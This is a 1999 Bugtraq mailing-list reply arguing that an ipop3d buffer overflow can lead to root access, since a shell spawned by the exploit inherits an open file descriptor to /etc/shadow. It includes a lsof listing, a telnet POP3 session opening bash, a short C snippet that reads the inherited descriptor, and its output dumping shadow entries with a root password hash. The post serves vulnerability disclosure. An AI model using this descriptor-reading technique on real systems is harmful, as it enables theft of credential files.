[10139] in bugtraq
Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight
daemon@ATHENA.MIT.EDU (M.C.Mar)
Thu Apr 8 16:18:22 1999
Date: Thu, 8 Apr 1999 16:39:30 +0200
Reply-To: "M.C.Mar" <emsi@it.pl>
From: "M.C.Mar" <woloszyn@IT.PL>
X-To: Stefan Rompf <srompf@TELEMATION.DE>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <3.0.1.32.19990406195725.00718e68@telesun2.telemation.de>
On Tue, 6 Apr 1999, Stefan Rompf wrote:
> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> >Exploited overflow in ipop3d could be used to gain superuser access =
(the
> >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris' setuid() m=
anpage:
>
> If the effective user ID of the process calling setuid() is
> the super-user, the real, effective, and saved user IDs are
> set to the uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.
>
But, (un)fortunately when exploiting ipop3d I found something like this=
:
Grabarz:~emsi# lsof -n | grep 1190
sh 1190 emsi cwd DIR 8,1 1024 2 /
sh 1190 emsi rtd DIR 8,1 1024 2 /
sh 1190 emsi txt REG 8,1 279352 16324 /bin/bash
sh 1190 emsi mem REG 8,1 78828 30629 /lib/ld-lin=
ux.so.1.9.5
sh 1190 emsi mem REG 8,1 11493 79564 /lib/libter=
mcap.so.2.0.8
sh 1190 emsi mem REG 8,1 605044 79566 /lib/libc.s=
o.5.4.33
[...]
sh 1190 emsi 3r REG 8,1 598 24674 /etc/shadow
Shel spawned via ipop3d explotation (no bonus -- no exploit core) inher=
its
opened fd :)
So we may do something like this:
emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington=
.EDU) at Fri, 9 Apr 1999 15:19:33 +0000 ( )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=3D1002(emsi) gid=3D100(users) groups=3D100(users)
: command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
char buf[255];
lseek(3,0,0);
read(3,buf,255);
printf("Be my guest:\n%s\n",buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$
./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
new=BF=A4=FE^
`
bash$
bash$
That's only example... It proofs that exploiting ipop3d could be useful=
l
to obtain root (or any other account) access and that the vulnerability
should be fixed.
P.S.
Greetings Lam3rZ Group, 3Kombajd_do_czere=B6ni testers and Lcamtuf (ty =
lamo,
czy wko=F1cu pode=B6lesz mi ten txt co mi obieca=B3e=B6? ;).
--
_______________________________________________________________________=
____
M.C.Mar An NT server can be run by an idiot, and usually is. emsi@i=
t.pl
"If you can't make it good, make it LOOK good." - Bill Gates
Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupo=
ty.
